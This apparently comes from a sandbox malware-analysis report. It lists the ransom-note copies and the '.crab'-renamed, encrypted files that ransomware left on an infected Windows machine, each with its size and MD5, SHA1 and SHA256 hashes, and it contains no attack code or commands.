SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\crash reports\events\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\bookmarkbackups\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crashes\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crashes\events\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp\winnt_x86-msvc\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\1.6\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082
False
c:\recovery\windowsre\boot.sdi.crab 3.02 MB MD5: 6dd0658c809fccdd0e5f01b8b6fcb539
SHA1: 6f384a2865c48a4da03aadc2d9a7c51f36f5685a
SHA256: 3204a9ed1972f903ae6f652c9cf181aec941672b865930a1b922855f3b0be3f2
False
c:\recovery\windowsre\reagent.xml.crab 1.54 KB MD5: 4d0006210ef2c172a984094956cac824
SHA1: aaba788ba0d9b62a53bab259b119c4486bb895fc
SHA256: c78478d54371220bd3e8e2286fd734d3e0f59b63aa14a471d891ca986b1b600d
False
c:\recovery\windowsre\winre.wim.crab 10.00 MB MD5: 54208dce16c52fbaf83953bbae810580
SHA1: c55e63332588c537d1dc9fc02b90a108267fb957
SHA256: 9b296b4bbece594c5756da14e3f9d43b0bc919da71f22d200fc9c0cf14459ffe
False
c:\system volume information\indexervolumeguid.crab 0.59 KB MD5: 80553cac2f001c47170c9cfeeb168f8c
SHA1: 9120d6d129cfc350db673f41d8ebded55daa3d2a
SHA256: ff226841add227ed3b637b475db683672acc9763fcff1f478f999c344571dbe8
False
c:\system volume information\tracking.log.crab 20.51 KB MD5: 9523c8cafaef4f220c70db6d2d4afdfe
SHA1: 60c2e350c95c1e047320b35c00fd10e4d4e5e92a
SHA256: 3c3bc04abc97ab3edb7679ca27e90828b02e3832354d0e576016127abd86de9e
False
c:\users\ciihmnxmn6ps\appdata\roaming\0e --sjj8.png.crab 30.46 KB MD5: de932cfce4f8d8655bf33e94012ae88f
SHA1: 38b403e61d74700dab18c089ec5538601dbb4097
SHA256: 4cfb3b93f242954ee16b11201ec8b4f3fcf52d3e25d841cc0fae3021d347c3b3
False
c:\users\ciihmnxmn6ps\appdata\roaming\3-ups.jpg.crab 14.60 KB MD5: 73d422769e21e01cefe46aab69fe6938
SHA1: c8a3623f84547d999dfe2e2fc995bb45ec9a3267
SHA256: eaec8dd12217803f1d6ce0f1c7224c9d828dc914b2fe683fcf2f7c8d16205a6f
False
c:\users\ciihmnxmn6ps\appdata\roaming\3rux.wav.crab 71.95 KB MD5: 049ca6aff570318c252e045aa67cdf27
SHA1: 8993f69a4c8358f0030d9b2ef533bb7ca2176eb4
SHA256: 280c538e1c1135bd3fb081b10fc18bf2dc541db56e7ac2aaa568cc937bd0ce9a
False
c:\users\ciihmnxmn6ps\appdata\roaming\4yuulka.odp.crab 45.16 KB MD5: ea1226b67aff17964311be77141af658
SHA1: 6b9163d8baf84f17d2f0cb0543cfce1e9fb11cc9
SHA256: c97b61f2fc5cff5f20b3c59535ae380c16857bc84f0be6732cd686bf24334bef
False
c:\users\ciihmnxmn6ps\appdata\roaming\5yzpgs xhyekxx.gif.crab 29.37 KB MD5: 57ac9cb3544706c66961d69b5af4cec3
SHA1: b1edf7a455e66a920c0f55000822f0e57170fde3
SHA256: 0f8b276c1f8adb5503e2edfdd98d691a9bb3ef87ccb5c660bd4fadfeca12d60b
False
c:\users\ciihmnxmn6ps\appdata\roaming\8g-qzf4n.wav.crab 97.24 KB MD5: 2e172cf40ebdb2f9eabf075619c9fd74
SHA1: 1bffdb77277402cd356690c097cdddc40db135c7
SHA256: 5bd872fa9be9a368b13e4bf3825d03d9074163275c4c5f3a2d4b0e270d75801d
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\jscache\globdata.crab 0.54 KB MD5: 0b84d1c1efc839727d88a8225eeab7b6
SHA1: faf590ee4e78a69af221edd17ca816e7ca691e4b
SHA256: d5911df33b787e8efd130ac2096b835dc322c3269771df22d7c6d9ff6f8781b4
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\jscache\globsettings.crab 0.54 KB MD5: cd98530205b6eabe03d214cfea97cad7
SHA1: e6a73af1e98a8315cc0d8f39c4453fcd51012961
SHA256: 7cf51dec1cb7822d3622df73d928cee384c1825ae1e1f6c06e62d898a019e4b0
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\addressbook.acrodata.crab 11.15 KB MD5: 4612a93e208119633367d6c6b5edc1de
SHA1: f9a791c29539c697540b5e22d3f4ea883a87a985
SHA256: a9575f9047cf9200a4074fdffe1b1d2b0b97c189860e9eea47a6a7029ead5ddf
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\crlcache\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.crab 1.13 KB MD5: 7085701187c81968f64028ca15b79f4e
SHA1: 26a5193965772faa68d9bfe0a72528b0590754a1
SHA256: ea2459710e72c2153a55b305517a9c1bab1f71104bfa065e4822e102c1ccaf15
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\crlcache\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.crab 0.93 KB MD5: 88422d61f933d86356e851adf5fe25a7
SHA1: 3fcf70391231bdbfcf281783c5f49b0e27c430d0
SHA256: 27c718d0d8342b897afef9c44c3ae6eca7cacd507d8bf7971389c61af4e1d3f5
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logtransport2.cfg.crab 0.73 KB MD5: 8ced5356da89c75cbbf844e0b3c6b341
SHA1: c928b01ca9de33bc0ddec6bd29442c1230e02972
SHA256: bc7847991697a7e46dd2af776eb03888489f8ac668b4f062023c22ef63af4347
False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\sonar\sonar1.0\sonar_policy.xml.crab 18.84 KB MD5: 5cf98e5a7a9a6974287769c832fbd876
SHA1: 1e9775c68807187761b6397dcad216e328d2d240
SHA256: aae68b1433f8b530fb4ee870b3e1311032211a51ed998f179eb6c64f03baf22e
False
c:\users\ciihmnxmn6ps\appdata\roaming\dggyafw7marna.mp3.crab 84.60 KB MD5: 7891f51df00927876076c0b2a8e8cf05
SHA1: 9a6b226772e302afae4af5fc60701b32f45e73c8
SHA256: ff95cb32bf5548c441fd3820ccc79daf5c8298a8206d96146964e5fe24d5565a
False
c:\users\ciihmnxmn6ps\appdata\roaming\es fttu75tp_vipeibw.avi.crab 48.65 KB MD5: 2afc33936a14493c6376fdcf5b3d1047
SHA1: ce2f7249ff367bba3daf1cc5f146941e5dbffff4
SHA256: 0651b2d41dafe29106c59f1c6f9d3e184fb08b67ca0f1fc92372ca663551713a
False
c:\users\ciihmnxmn6ps\appdata\roaming\f8jdr2jrbep0jyz8s.avi.crab 81.07 KB MD5: c8286841bcff93e4303bf66643db77b5
SHA1: 61051595492b9d98c66e1f3e2bc05536e45c622c
SHA256: 549c1ba56cf5abf030ca082f30a5a773c875774849e738d8096ed0b00b565ca6
False
c:\users\ciihmnxmn6ps\appdata\roaming\igmn c6ke0bqmjb3av4t.png.crab 74.40 KB MD5: 568a0aa72efff30a9a8f4c95a873e434
SHA1: aae6b5e0a2efc762d7360e8b5bb341e7acc66d9b
SHA256: 3884706d0dcb3f705244dc1c6e0143977dbb491324648590a1a8d36cb585fd7e
False
c:\users\ciihmnxmn6ps\appdata\roaming\jhdvv4gfpcmyf.gif.crab 56.73 KB MD5: 720ae428b3fd69c34714417fdd71dd32
SHA1: cce04a19b2bd66632fc69d7ca919174d702e3815
SHA256: 1d53368e37699eded509ad518e4c2a61e57f8a38bb8c917fb422a6769ff372ed
False
c:\users\ciihmnxmn6ps\appdata\roaming\k npggqvdn.flv.crab 71.01 KB MD5: de05738c31a83fb5e67578abd90f1b94
SHA1: e6defe5f2903aeba31b1bda64b8cad77d7ae25c9
SHA256: 28c9af1e1d45084f5c192a6bfab21baba3df1bf0451c2abd383305b45e82dc55
False
c:\users\ciihmnxmn6ps\appdata\roaming\khyklcmkh.avi.crab 58.73 KB MD5: 1f14e636a6046325cb5d5053e0f10f8b
SHA1: 951c591aa28db64290f15b5ccf4cfed1155a0ced
SHA256: 0d6c2a14daba554ad71d62f880d818116fe1ebdd1b5e6dbe6474234c2f49cb73
False
c:\users\ciihmnxmn6ps\appdata\roaming\lvjc0a8xxra.flv.crab 65.74 KB MD5: f98c5b503db881496ec6403bd4f708f7
SHA1: 8f3d18bf30f0a5514f9fc773b70edaa83a1c3f28
SHA256: 9c9ab76212545bf3c6bf76195649e0150e7e2be75f013714cf9530c69eed933d
False
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 1.01 KB MD5: 02a7a9f667124534d3cddd98147fb6ff
SHA1: 3a54a41fbcddd36d52fe2f7a3544a8bfc7587e4f
SHA256: 9a54a79b5599a99f7d3a51e2d1bec77a95f62da9ab5be92896ddad12f9708c54
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\access\accesscache.accdb.crab 196.51 KB MD5: 7c821798fc35fe1735c9fddf46b5ac12
SHA1: 5cfe1c5dc8731a25491286747b0565fbb35e8b51
SHA256: 3c049a648ed6feb3cfdc95f21942c8a1e6ba0b53e8e38700bed9db9873d7a512
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\access\system.mdw.crab 124.51 KB MD5: c8dff0181129c3adcddb33db37269545
SHA1: eae188bbb117f4e511196a614d6786d5d05d8aee
SHA256: 409a60a459416a625eb1782fe97065f2faf1d2a2b8ee1e1f29daf3d4449995df
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\apasixtheditionofficeonline.xsl.crab 326.30 KB MD5: 9d5f61fe9c5d36adcce2f721ea85e250
SHA1: 7204b03b6da05179b8220be83e244fa0bdb5e63d
SHA256: eb031246ad32516244102dbbc6ef3b1d299ce372e75774a79c20e154a258b251
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\chicago.xsl.crab 290.57 KB MD5: 4b17366e24f4dd730ab5d6bf7652f5d8
SHA1: c7f24892dd9f30e729bb69d2826af6560a563a76
SHA256: 39af4c643898dfcba63f0038593c9c87f5e3265f93e01c4740720219f151dc0a
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\gb.xsl.crab 262.88 KB MD5: 6f93f0e6d40c004235f9a60bbc905636
SHA1: 9651aeb65f0c750f090f1e85fc36c3bd86dcddc3
SHA256: 4378798cc7572af1fed3f7ad08ec503d54cec1390e40a6c11a419e4fec2011c9
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\gostname.xsl.crab 250.87 KB MD5: 1aad2399ec65ba7230119a48a9c74c1b
SHA1: 11cc20a0269bcbcc8e16ed74fd74b8c56ad3813c
SHA256: 11de03b2323817e26a00faf5a54c0747bfd105806361f0b9d06527d05221523a
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\gosttitle.xsl.crab 246.07 KB MD5: ec35b764f3e0c7730d036bd86dc8f019
SHA1: dc40659e319578c16bba18dc7ad1f22580c831f2
SHA256: 5c4f76f59bbbca63e4d305ec729fe62046100cf484ea89a7228ce8fe9e2d15e6
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\harvardanglia2008officeonline.xsl.crab 278.65 KB MD5: 22b9aabb2f646bcfdc1d23e9224c37c3
SHA1: 6f81c0fd86207297b4b1dfd3284b16787b07aa50
SHA256: f954251780ca8e8c9f965acde9bd26a415a4aafee28387aec1c6722210aeb371
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\ieee2006officeonline.xsl.crab 288.13 KB MD5: bee61378e2c1acc77147e215d809e1f8
SHA1: ac26145bf55cef68b1aeab08553b1649385f65b4
SHA256: 0c2088f4e58914f3d3f36cfe45d7668c383b1ec1a52bda3533d8011862094a0f
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\iso690.xsl.crab 264.82 KB MD5: e3fd71ff84c02a2239c3225dc3ff95cd
SHA1: 6250b79f6be0168b6bfcfbb1ea83d8499eea6adb
SHA256: 08c4612e98cdad00572f03ddf17948e1c9eac0034f020145098efd3a1a98b5b6
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\iso690nmerical.xsl.crab 212.99 KB MD5: 5dcb2880f700180270702a41ed03f90c
SHA1: 8b8f90c99ab29981c47cb133c3af740dea730f0a
SHA256: d44eb47b99a5d42b382be55b77412953b4ad57e50404b35276ba1876e6a1fe3f
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\mlaseventheditionofficeonline.xsl.crab 249.76 KB MD5: 79905211bb394e0f45a20a22a108e26b
SHA1: 442e166b55ce1bc0910533337de9bab1123498d2
SHA256: bf7f50b6c149dce3c2302145281b51757599e1cf72b172e3a38d3cea18e1ff70
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\sist02.xsl.crab 245.96 KB MD5: 1f4559cecc0fa52dde9fd9b1ba9afe08
SHA1: 27316fc551ccb8e3de952cb30cf99ca2933eb178
SHA256: 8c9eef55206ad2633fe4235d546755976fadf2ebc62d9c49918b4ba1b709fbdf
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\turabian.xsl.crab 337.10 KB MD5: e58cb579be380da32075c8587c998bcb
SHA1: 934e3f1335e9bbaaf22a371d80c6dcd7cf318d8b
SHA256: 8acdf8446356f3c52e8490e4e9f258048cd9ae280021b465f3e7787fa68a140e
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b.crab 0.57 KB MD5: ff0f68836d4f7e3f08908faa381cbe5d
SHA1: 4883b6ab27d054a3a5ac5e0891504882c625e091
SHA256: be58e82be4e1f4d7c87adc340ca7382a763ca80e520f0001faccd3bed251cf2d
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b.crab 0.55 KB MD5: 11ac367f9467c3a90a57fbf91614b9a7
SHA1: 3de04933f5f34e17008f9c7e9b0324032ad2d5ad
SHA256: dfe28b12872bb2ee2ba4e44bc35f96bd2eda6e6811967d3afa489595f67dd7c6
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx.crab 3.53 MB MD5: 75a8e473f54615fe7479b3124ba5afb6
SHA1: 4941fe577924812adfc50f0378764f8f405c1777
SHA256: 859b24df0534d7d3e737dab3ab18e9136980b8d9a47a280c84ad563c7cad0784
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\ms project\16\en-us\global.mpt.crab 1.21 MB MD5: fde7aef723d4e1ebdf5972378d4b3953
SHA1: 0150d3d45c0c414a6aafe92694164fdcecc8ba86
SHA256: f7e087a55997436a1a766c4e1b19966dead71b161e712858489969b6b84766ec
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\mso1033.acl.crab 37.37 KB MD5: c8a311654d98cfca53e71bd2569542af
SHA1: ccc97ef553fe488012bf8f8465819e07aa0228bc
SHA256: a628c5f60b4594bf1cfa33967b3b8ae0bdd10043aed376ed1afcedaad455511b
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\database1.lnk.crab 1.60 KB MD5: 58920a0bcb39bd7d0e6bbbd6d478dd2c
SHA1: 46ed77b212d799d236bb316f461aeea6fe054e0c
SHA256: f07e4d09546839dab4bf321338dacd1c4ffd864f4066b338a572c1a585d8b4d1
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\documents.lnk.crab 1.45 KB MD5: c28025550d26368bf99185dfad3f8566
SHA1: 41e33a1a0cd8bd965ad55848276c30d06cae5bc9
SHA256: 5ff894a7cbca86b45e023a469e99a12b8c85178eeebe571e963f6621b0bdfc29
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\global.lnk.crab 1.98 KB MD5: e7edef31240c290bc68bebea1b609e8e
SHA1: e5d7d8c781645e9733fde077cbcbaef67d817811
SHA256: 19d893ce65d0c28890a2e454f08e53d902b964761cf4525144bd7e42255a7e29
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\index.dat.crab 0.60 KB MD5: 309e622a1e227ed6f83ccab86750946a
SHA1: 576977b6f0887b0aca1b04434adfcb8e5ecf698f
SHA256: 47dccd0d8a5969b4a7cb96e8dd42e5640a185dc5291cc21033d65d6edb85d477
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\templates.lnk.crab 1.68 KB MD5: bdbf45587f0f37f146367a06995702d7
SHA1: 7eb292b28522ed2374f8e2e10d5100f696bf84be
SHA256: e1a4fbeb16be6ed6c161153ddfbebd5fbfa947ba294db108a96b9c4a6f616cb6
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\onenote\16.0\preferences.dat.crab 5.57 KB MD5: b423432d70e4ed9bb47949228428d199
SHA1: 60249294be93d0d0e766dc7ca3145dd85cd538ed
SHA256: 835b58e2c2721fd49c1b27ab25d4bcc51b561d745aa04e357e624fd5b8865e00
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\outlook.srs.crab 3.01 KB MD5: cb2a3202b34a75fc9e23fc70de612cd5
SHA1: 7aca71fd745a337429867574c0f8202031d3f528
SHA256: a3d2e5bc2645a29a274643b6de9bf30785c417d89900f9d1a79cc5f6b8b6dc08
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\outlook.xml.crab 2.85 KB MD5: 9df3f73bf68e8d035cc6cfac629f35dd
SHA1: 8795c56c06ca42ce7b9411cae2979ef5563cd29e
SHA256: 55aa17d69ccf568d0be0bcfd9dd13f6436424af0a44e7956be18f9cfc1004259
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\credhist.crab 0.96 KB MD5: e33260e697cae0b0bee3481867466e28
SHA1: f544a07d5fad4e16208ff1515a93adc3ac419d9b
SHA256: 08982d6a8ee2dde1b30ecd0303a78ff3be01adacf32239878e2006125bd8037a
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\2bee18a0-05e9-4ff8-a362-afe43ec984b0.crab 0.98 KB MD5: 263dd7b7f80d339239f7d99d234a2b83
SHA1: c113191ae14d189c607556761d1527aaf3a569cb
SHA256: 466dd1844f2540341411028b79e624bc5eb7b73d62b5abee57d0e6b6a15e6f77
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\496f2c5b-a90f-4380-b805-3bf6ac63451b.crab 0.98 KB MD5: 3c64c47a09ef59ff30604b2d5cf5df63
SHA1: 5c7a5e877e59de50fe15d724a87d10190884c170
SHA256: a7a37b69648e207c868c1fbf4e96f1fb29c5de3f06f8e2a27f9d76cb4cdcb111
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\5b8a3202-35dc-4437-b5d7-374f5e872415.crab 0.98 KB MD5: 853f897e599aadb4a1461dcf3a04e884
SHA1: 426aab5b2c08e3d1849efcf2f809813a36e6ff14
SHA256: ce1c6fa3dbb3ca8c6e14588cdbd2e8f3b7d4991d48d0ee0b2196a61811579e2a
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\d7746ecf-458e-4e71-8557-8ac80457022a.crab 0.98 KB MD5: 30ae3c733cae8363332e9e2a37fe63d6
SHA1: 92c6a0915bf33999093c5cc58b2488134a2d6b31
SHA256: 0e86892a4a26faebfcea454688d3a2087543a794e25494eae57abff4b5b434c5
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\preferred.crab 0.54 KB MD5: ffa8eb28ac620dc777e9b8ddbcaf3f70
SHA1: c85e747b928c3bce8144023408d0a5cfd8b13b0a
SHA256: a81225083c4423b8316115bcfe40c36deb9b1682c0c5ac1f8afbbf054a2cdfc7
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\synchist.crab 0.59 KB MD5: 6a47810b43acdedb259761d829215859
SHA1: 65755d46c9753b241a7f788068affc3f3dd27fad
SHA256: 83b8a77f3f0748fd97dd98036662ab26a9655db203776c8943fea1a5f9c812a8
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\publisher building blocks\contentstore.xml.crab 0.68 KB MD5: 56543dbf9cede5816094ce0471b8ca96
SHA1: 559bc0a6706442da09704fff3cae3b8ab61918da
SHA256: 9d0854ed89ee4e1a4e3f8df81b2943e7b5f8f53b645e58b2b94068ba6c0df8cb
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\calendar insights.xltm.crab 893.37 KB MD5: 4bbb076010beca28c800066082403ae3
SHA1: 35805ed2c3bb4e43a539b41db78dd7d38ca61b1a
SHA256: 99a07901769d6b0a4add7464b40f10523bf104bf38f26eb57c8c0cc60beda782
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\cashflow analysis.xltm.crab 371.62 KB MD5: aafd1a8c1bdc3a02d046047423372792
SHA1: cc73dfed07a1141322f9df25a1a3c20d7ba077a6
SHA256: cd8d6fae0b34bb44d443028137c51f07929934450ca823848137888e130d9d54
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\email insights.xltm.crab 721.29 KB MD5: e2e4764cb05885c4c939eb04078c6162
SHA1: 0b51e0fd9edf5408109a5a51f8b88a24a29317d2
SHA256: e90537aa2c6aef41c38ac48ae9d741a789d835eaa2921670186218638ba8bb60
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090430[[fn=banded]].thmx.crab 549.46 KB MD5: a460c47aeea26c2823b65f2eae2a22cd
SHA1: 7579f311e3b7978dc029563f68d217060339594b
SHA256: 662379a2bbc473f1e3d8e64a12888ba2eb38da266861f35547556e21e12a554a
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03090434[[fn=wood type]].thmx.crab 1.57 MB MD5: a1ed4fc22d3694254376f560990212f8
SHA1: d5284dc822318c6a470477849118ea53eef2f2ba
SHA256: e381bad358bf3fc6e3d87e4f4b7a17589b4f89e564fc82cb671b8f5edcf50548
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457444[[fn=basis]].thmx.crab 545.48 KB MD5: dca1ec9e6070fdd76b4aa28f1d596cf0
SHA1: 33701040bcdc81d07ce7a7c3b85ad91f1416740c
SHA256: da10ea6f99f516d84dc6e49e6131572b664d8e2730a8c55dbe4dac7b4ba86dd2
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457464[[fn=dividend]].thmx.crab 558.04 KB MD5: 086b745fa9f70cf724dccc72e123f3ee
SHA1: ef11726f16ed826c558213dc121c2aaca2f3a13b
SHA256: 44962559070034fa2c69d1fa7eaa2ed76a32f7f22e33f963a1c5dd02d1d5d8ec
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457475[[fn=frame]].thmx.crab 511.30 KB MD5: 29aa7cb19c4e87c1e0b05f07a8b3fc7f
SHA1: a7a75157f17aba4991051904210b5e045d364342
SHA256: 725af70bef554bd9a51372cb98bb2183de6831d7615de241018e3ace966556ee
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457485[[fn=mesh]].thmx.crab 2.94 MB MD5: 6a0523ddb837ded9b9abd29b101ff964
SHA1: e1a32c24b2fa69ab3bd6745d0a8e65c28996e5fc
SHA256: 45845682f9b471c786cc8042a9ff77b2ec4007558fa9e78d3005ebf7ec0b2a60
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457491[[fn=metropolitan]].thmx.crab 759.93 KB MD5: 0727161699fa06e693c748ec6e6689db
SHA1: a1bc091cd24824ffab06d13262f2743d0c980f40
SHA256: 98dde0efd23feaa29d853065794f7a63311568d3e7d77f49dca946bdd0e3d2a5
False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\tm03457496[[fn=parallax]].thmx.crab 903.52 KB MD5: 17bffcce12bff7bd31b79a431904b969
SHA1: c309c6feedb7c87daf9ed8b45a49f359fb366eb6
SHA256: afc402a04b4db0060079a0dd525623c5456bfee6114ceb8a55bc977712050ff6
False
